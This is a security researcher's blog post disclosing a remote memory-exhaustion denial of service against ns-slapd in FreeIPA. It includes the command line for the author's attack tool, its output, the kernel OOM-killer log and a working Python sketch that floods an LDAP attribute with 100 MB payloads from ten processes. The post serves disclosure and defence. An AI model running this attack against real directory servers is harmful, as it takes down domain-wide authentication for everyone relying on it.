FreeIPA Memory Exhaustion ns-slapd Remote DOS

- By Leszek Miś

FreeIPA is a Linux / open source alternative to Microsoft Active Directory. I like to call it the 'Linux Domain Controller'. It's a great solution for Linux server environments where you are looking for centralized authentication, Kerberos Single Sign-On, or any of the other built-in network functionality on this list:

  • DNS
  • Kerberos
  • LDAP
  • NTP server
  • PKI
  • HBAC - Host-Based Access Control
  • SSH Public Key MGMT
  • Domain Trusts
  • HTTP server for hosting web management panel and API

If you are looking for a fast deployment path for a Kerberos-based Linux environment, then it's probably the easiest and fastest way to start playing. It's also worth mentioning that the FreeIPA stack is fully confined by SELinux policy.

All right, back to the main topic.

During security research, I found an easy way to remotely trigger the kernel's OOM killer against ns-slapd - the main process of the 389 Directory Server and one of the most important processes in the FreeIPA stack. The Linux 'OOM killer' sacrifices one or more processes in order to free up memory for the system. You can find more about the OOM killer here: https://linux-mm.org/OOM_Killer
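
On Linux you can check how exposed a given process is to the OOM killer by reading its badness score from /proc - the same numbers that show up in the `oom_score_adj` column of the dmesg report further down in this post. A minimal sketch (Linux only, standard library only):

```python
# Inspect a process's OOM-killer exposure via /proc (Linux only).
# A higher oom_score means the kernel is more likely to sacrifice that
# process under memory pressure; oom_score_adj of -1000 makes it immune
# (that's why sshd and auditd survive in the dmesg dump while ns-slapd,
# sitting at adj 0 with a huge RSS, is the prime victim).
import os
from pathlib import Path

def oom_score(pid: int) -> int:
    """Return the kernel's current OOM badness score for `pid`."""
    return int(Path(f"/proc/{pid}/oom_score").read_text())

def oom_score_adj(pid: int) -> int:
    """Return the user-tunable adjustment (-1000 .. 1000)."""
    return int(Path(f"/proc/{pid}/oom_score_adj").read_text())

if __name__ == "__main__":
    pid = os.getpid()
    print(f"pid={pid} oom_score={oom_score(pid)} adj={oom_score_adj(pid)}")
```

Run it with the PID of ns-slapd (e.g. `$(pidof ns-slapd)`) to see how the score climbs as the process's resident memory grows.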

I ran a bunch of tests where FreeIPA was running:

  • inside VirtualBox VM @ desktop
  • inside KVM VM @ desktop
  • inside KVM VM @ dedicated bare-metal server connected to a 1Gb switch

Tests were carried out taking into account changes in the RAM size assigned to the VM (2 GB and 4 GB of RAM per VM).

In every case, the ns-slapd process was killed by the OOM killer shortly after I started the ldap-exfil.py script - sounds like a remote denial of service, right?

Details below:

[root@freeipa ~]# cat /etc/redhat-release
CentOS Linux release 7.6.1810 (Core)

[root@freeipa ~]# rpm -qa | grep ipa
python2-ipaserver-4.6.4-10.el7.centos.noarch
ipa-server-dns-4.6.4-10.el7.centos.noarch
ipa-common-4.6.4-10.el7.centos.noarch
ipa-client-common-4.6.4-10.el7.centos.noarch
python-ipaddress-1.0.16-2.el7.noarch
python2-ipaclient-4.6.4-10.el7.centos.noarch
ipa-client-4.6.4-10.el7.centos.x86_64
ipa-server-4.6.4-10.el7.centos.x86_64
ipa-server-common-4.6.4-10.el7.centos.noarch
sssd-ipa-1.16.2-13.el7.x86_64
python2-ipalib-4.6.4-10.el7.centos.noarch
libipa_hbac-1.16.2-13.el7.x86_64
python-libipa_hbac-1.16.2-13.el7.x86_64
python-iniparse-0.4-9.el7.noarch

[root@freeipa ~]# rpm -qa | grep 389
389-ds-base-libs-1.3.8.4-18.el7_6.x86_64
389-ds-base-1.3.8.4-18.el7_6.x86_64

The system literally does not do anything:

[root@freeipa ~]# top -p $(pidof ns-slapd)
top - 03:17:28 up 49 min, 2 users, load average: 0.07, 0.16, 0.15
Tasks: 1 total, 0 running, 1 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.0 us, 0.3 sy, 0.0 ni, 99.7 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 2047164 total, 219388 free, 1012848 used, 814928 buff/cache
KiB Swap: 1998844 total, 1998580 free, 264 used. 816324 avail Mem

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
3606 dirsrv 20 0 721044 84636 32420 S 0.7 4.1 0:19.50 ns-slapd


For the test case, I had already created a test user 'enet':

[root@freeipa ~]# kinit admin
[root@freeipa ~]# ipa user-find enet
--------------
1 user matched
--------------
User login: enet
First name: exfil
Last name: net
Home directory: /home/enet
Login shell: /bin/sh
Principal name: enet@LAB.VM
Principal alias: enet@LAB.VM
Email address: enet@lab.vm
UID: 633800001
GID: 633800001
Account disabled: False
----------------------------
Number of entries returned 1
----------------------------

Now, let's run the DOS mode of the ldap-exfil.py script (the get / set modes will be covered in the next blog post):

# python ldap-exfil.py --server ldap://192.168.56.10:389 -d uid=enet,cn=users,cn=accounts,dc=lab,dc=vm -a gecos -m dos -p 'lolipop123'

*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))

[root@freeipa ~]# dmesg
[ 2169.564589] Call Trace:
[ 2169.564598] [<ffffffff9e961e41>] dump_stack+0x19/0x1b
[ 2169.564601] [<ffffffff9e95c86a>] dump_header+0x90/0x229
[ 2169.564605] [<ffffffff9e500bcb>] ? cred_has_capability+0x6b/0x120
[ 2169.564609] [<ffffffff9e3ba4e4>] oom_kill_process+0x254/0x3d0
[ 2169.564612] [<ffffffff9e500cae>] ? selinux_capable+0x2e/0x40
[ 2169.564614] [<ffffffff9e3bad26>] out_of_memory+0x4b6/0x4f0
[ 2169.564617] [<ffffffff9e95d36e>] __alloc_pages_slowpath+0x5d6/0x724
[ 2169.564620] [<ffffffff9e3c1105>] __alloc_pages_nodemask+0x405/0x420
[ 2169.564624] [<ffffffff9e40df68>] alloc_pages_current+0x98/0x110
[ 2169.564626] [<ffffffff9e3b6347>] __page_cache_alloc+0x97/0xb0
[ 2169.564629] [<ffffffff9e3b8fa8>] filemap_fault+0x298/0x490
[ 2169.564660] [<ffffffffc0226d0e>] __xfs_filemap_fault+0x7e/0x1d0 [xfs]
[ 2169.564664] [<ffffffff9e2c2dc0>] ? wake_bit_function+0x40/0x40
[ 2169.564678] [<ffffffffc0226f0c>] xfs_filemap_fault+0x2c/0x30 [xfs]
[ 2169.564682] [<ffffffff9e3e444a>] __do_fault.isra.59+0x8a/0x100
[ 2169.564685] [<ffffffff9e3e49fc>] do_read_fault.isra.61+0x4c/0x1b0
[ 2169.564687] [<ffffffff9e3e93a4>] handle_pte_fault+0x2f4/0xd10
[ 2169.564689] [<ffffffff9e3ebedd>] handle_mm_fault+0x39d/0x9b0
[ 2169.564692] [<ffffffff9e96f5e3>] __do_page_fault+0x203/0x500
[ 2169.564694] [<ffffffff9e96f915>] do_page_fault+0x35/0x90
[ 2169.564697] [<ffffffff9e96ba96>] ? error_swapgs+0xa7/0xbd
[ 2169.564699] [<ffffffff9e96b758>] page_fault+0x28/0x30
[ 2169.564701] Mem-Info:
[ 2169.564706] active_anon:352087 inactive_anon:117920 isolated_anon:0
active_file:152 inactive_file:2153 isolated_file:0
unevictable:0 dirty:0 writeback:0 unstable:0
slab_reclaimable:4261 slab_unreclaimable:7628
mapped:92 shmem:7 pagetables:6833 bounce:0
free:13241 free_pcp:30 free_cma:0
[ 2169.564710] Node 0 DMA free:8264kB min:348kB low:432kB high:520kB active_anon:3124kB inactive_anon:3236kB active_file:0kB inactive_file:488kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15992kB managed:15908kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:220kB slab_unreclaimable:152kB kernel_stack:32kB pagetables:320kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1892 all_unreclaimable? yes
[ 2169.564716] lowmem_reserve[]: 0 1980 1980 1980
[ 2169.564719] Node 0 DMA32 free:44700kB min:44704kB low:55880kB high:67056kB active_anon:1405224kB inactive_anon:468444kB active_file:608kB inactive_file:8124kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080704kB managed:2031256kB mlocked:0kB dirty:0kB writeback:0kB mapped:368kB shmem:28kB slab_reclaimable:16824kB slab_unreclaimable:30360kB kernel_stack:5280kB pagetables:27012kB unstable:0kB bounce:0kB free_pcp:120kB local_pcp:120kB free_cma:0kB writeback_tmp:0kB pages_scanned:10243 all_unreclaimable? yes
[ 2169.564725] lowmem_reserve[]: 0 0 0 0
[ 2169.564728] Node 0 DMA: 8*4kB (UE) 7*8kB (UEM) 1*16kB (U) 5*32kB (UM) 1*64kB (U) 2*128kB (U) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 2*2048kB (UM) 0*4096kB = 8264kB
[ 2169.564740] Node 0 DMA32: 1053*4kB (UE) 723*8kB (UEM) 295*16kB (UE) 153*32kB (UEM) 78*64kB (UE) 37*128kB (U) 24*256kB (U) 16*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 44700kB
[ 2169.564751] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 2169.564752] 2643 total pagecache pages
[ 2169.564754] 303 pages in swap cache
[ 2169.564756] Swap cache stats: add 824115, delete 823812, find 158440/179214
[ 2169.564757] Free swap = 0kB
[ 2169.564758] Total swap = 1998844kB
[ 2169.564759] 524174 pages RAM
[ 2169.564760] 0 pages HighMem/MovableOnly
[ 2169.564761] 12383 pages reserved
[ 2169.564762] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name
[ 2169.564774] [ 1411] 0 1411 10057 1 23 106 0 systemd-journal
[ 2169.564776] [ 1437] 0 1437 31837 0 29 712 0 lvmetad
[ 2169.564779] [ 1453] 0 1453 11887 1 27 546 -1000 systemd-udevd
[ 2169.564783] [ 2560] 0 2560 15511 4 28 152 -1000 auditd
[ 2169.564785] [ 2583] 999 2583 156313 0 66 2031 0 polkitd
[ 2169.564788] [ 2584] 81 2584 19720 93 36 108 -900 dbus-daemon
[ 2169.564791] [ 2585] 32 2585 18412 0 38 190 0 rpcbind
[ 2169.564794] [ 2592] 0 2592 64339 5 78 330 0 sssd
[ 2169.564796] [ 2598] 0 2598 89548 0 95 5527 0 firewalld
[ 2169.564798] [ 2602] 0 2602 69413 0 48 203 0 gssproxy
[ 2169.564801] [ 2610] 0 2610 11714 0 26 140 0 rpc.gssd
[ 2169.564803] [ 2611] 0 2611 99294 16 136 648 0 sssd_be
[ 2169.564806] [ 2612] 0 2612 59550 21 71 198 0 sssd_sudo
[ 2169.564808] [ 2613] 0 2613 66242 20 84 214 0 sssd_nss
[ 2169.564811] [ 2614] 0 2614 59037 22 71 202 0 sssd_ifp
[ 2169.564813] [ 2615] 0 2615 61158 22 76 204 0 sssd_pam
[ 2169.564815] [ 2616] 0 2616 58985 22 71 191 0 sssd_ssh
[ 2169.564818] [ 2617] 0 2617 69110 21 87 295 0 sssd_pac
[ 2169.564821] [ 2618] 0 2618 6594 23 17 52 0 systemd-logind
[ 2169.564823] [ 2622] 0 2622 31572 0 20 160 0 crond
[ 2169.564826] [ 2646] 0 2646 27523 0 10 33 0 agetty
[ 2169.564828] [ 2647] 0 2647 118940 39 86 968 0 NetworkManager
[ 2169.564831] [ 3113] 0 3113 143456 127 99 2668 0 tuned
[ 2169.564833] [ 3114] 0 3114 28189 0 58 257 -1000 sshd
[ 2169.564835] [ 3116] 0 3116 13179 0 30 105 0 oddjobd
[ 2169.564838] [ 3117] 0 3117 24340 1 52 312 0 certmonger
[ 2169.564840] [ 3119] 0 3119 54102 1 42 666 0 rsyslogd
[ 2169.564842] [ 3371] 0 3371 22907 0 44 262 0 master
[ 2169.564845] [ 3377] 89 3377 25474 0 47 254 0 pickup
[ 2169.564847] [ 3378] 89 3378 25491 0 45 256 0 qmgr
[ 2169.564849] [ 3392] 0 3392 43276 31 84 317 0 sshd
[ 2169.564852] [ 3524] 0 3524 28860 1 14 96 0 bash
[ 2169.564854] [ 3617] 995 3617 1011302 457215 1678 306673 0 ns-slapd
[ 2169.564857] [ 3651] 0 3651 66785 0 79 482 0 krb5kdc
[ 2169.564859] [ 3657] 0 3657 67578 1 82 2562 0 kadmind
[ 2169.564861] [ 3667] 25 3667 99885 0 112 15558 0 named-pkcs11
[ 2169.564864] [ 3678] 0 3678 107169 34 179 2413 0 httpd
[ 2169.564866] [ 3680] 0 3680 8708 0 23 110 0 nss_pcache
[ 2169.564869] [ 3683] 994 3683 172203 0 197 3696 0 httpd
[ 2169.564871] [ 3684] 994 3684 155819 0 196 3694 0 httpd
[ 2169.564874] [ 3685] 993 3685 181458 528 287 19997 0 httpd
[ 2169.564876] [ 3686] 993 3686 197842 527 288 19999 0 httpd
[ 2169.564878] [ 3687] 993 3687 181458 528 287 19997 0 httpd
[ 2169.564881] [ 3688] 993 3688 181458 528 287 19997 0 httpd
[ 2169.564883] [ 3689] 48 3689 113725 6 163 3058 0 httpd
[ 2169.564885] [ 3690] 48 3690 113725 6 163 3058 0 httpd
[ 2169.564888] [ 3691] 48 3691 113725 6 163 3058 0 httpd
[ 2169.564890] [ 3692] 48 3692 113725 6 163 3058 0 httpd
[ 2169.564892] [ 3693] 48 3693 113725 15 163 3052 0 httpd
[ 2169.564895] [ 3696] 0 3696 83148 128 118 5859 0 ipa-custodia
[ 2169.564897] [ 3764] 38 3764 10547 32 21 124 0 ntpd
[ 2169.564899] [ 3913] 17 3913 666454 7265 182 31326 0 java
[ 2169.564902] [ 4058] 997 4058 132210 1 201 19581 0 ipa-dnskeysyncd
[ 2169.564904] [ 4103] 0 4103 40437 60 36 76 0 top
[ 2169.564906] Out of memory: Kill process 3617 (ns-slapd) score 756 or sacrifice child
[ 2169.565231] Killed process 3617 (ns-slapd) total-vm:4045208kB, anon-rss:1828860kB, file-rss:0kB, shmem-rss:0kB

Basically, the script spawns 10 processes in parallel. Every process sends 1024*1024*100 bytes of a base64-encoded string and saves it directly into the LDAP gecos attribute, which generates a high number of ldap.MOD_REPLACE operations and, in the end, high RAM consumption. The ns-slapd process memory swells and finally blows up. You can see how the memory usage grows within seconds - check out the short YouTube demo below:
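
The script itself is not published here, but the core idea can be sketched roughly as follows. This is a hypothetical reconstruction using the python-ldap package, not the original tool: the payload size, the `RUN_DOS` guard, and the function names are my assumptions; the DN, server and password mirror the command line shown above.

```python
# Rough sketch of the DOS mode described above: ten workers keep replacing
# a single user's gecos attribute with a ~100 MB base64 blob, driving
# ns-slapd's memory up until the kernel's OOM killer takes it down.
# Assumes the third-party python-ldap package (pip install python-ldap).
import base64
import multiprocessing
import os

try:
    import ldap  # third-party; guarded so the sketch still imports without it
except ImportError:
    ldap = None

PAYLOAD_SIZE = 1024 * 1024 * 100  # ~100 MB per modify request (assumption)

def build_payload(size: int = PAYLOAD_SIZE) -> bytes:
    """Return a base64-encoded random blob of roughly `size` bytes."""
    return base64.b64encode(os.urandom(size * 3 // 4))

def dos_worker(server: str, bind_dn: str, password: str,
               target_dn: str, attr: str = "gecos") -> None:
    """Bind, then loop ldap.MOD_REPLACE operations until the server dies."""
    payload = build_payload()
    conn = ldap.initialize(server)
    conn.simple_bind_s(bind_dn, password)
    while True:
        try:
            print("*** Size: [ %d ] bytes" % len(payload))
            conn.modify_s(target_dn, [(ldap.MOD_REPLACE, attr, payload)])
        except ldap.LDAPError as err:
            print("*** ERROR", err)  # e.g. SERVER_DOWN once ns-slapd is gone

if __name__ == "__main__" and ldap is not None and os.environ.get("RUN_DOS"):
    # Only runs when explicitly requested: RUN_DOS=1 python sketch.py
    dn = "uid=enet,cn=users,cn=accounts,dc=lab,dc=vm"
    workers = [multiprocessing.Process(
                   target=dos_worker,
                   args=("ldap://192.168.56.10:389", dn, "lolipop123", dn))
               for _ in range(10)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
```

Note that the workers bind with the target user's own DN and password, as the `-d`/`-p` options of the original command line suggest - i.e. an unprivileged account writing to its own entry appears to be sufficient.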

From my perspective, it's clearly a low/medium severity vulnerability that could allow an authenticated remote attacker to cause a denial of service (DoS) condition on an affected system. It is due to improper validation of user-supplied data. An attacker could exploit this vulnerability by sending malicious LDAP requests to the LDAP server, which can cause a service disruption for the whole domain environment, or it can be one step of a chained attack where the attacker wants to log in to the system using local credentials rather than domain ones - which is potentially possible after killing ns-slapd.


I was in touch with the Red Hat Security Team regarding this vulnerability; however, they were not able to reproduce the behavior. I am wondering if someone from the community could try to run the test and give some feedback - that would be awesome. I ran the test many times during the research, and during training sessions as well, with 100% reliability: every time, the ns-slapd process was killed at once.

In the next blog post, I will cover how to detect such behavior from the network perspective using the Bro IDS and its LDAP analyzer. Re-share and re-tweet if you enjoyed it.

Leszek Mis @ Defensive-security.com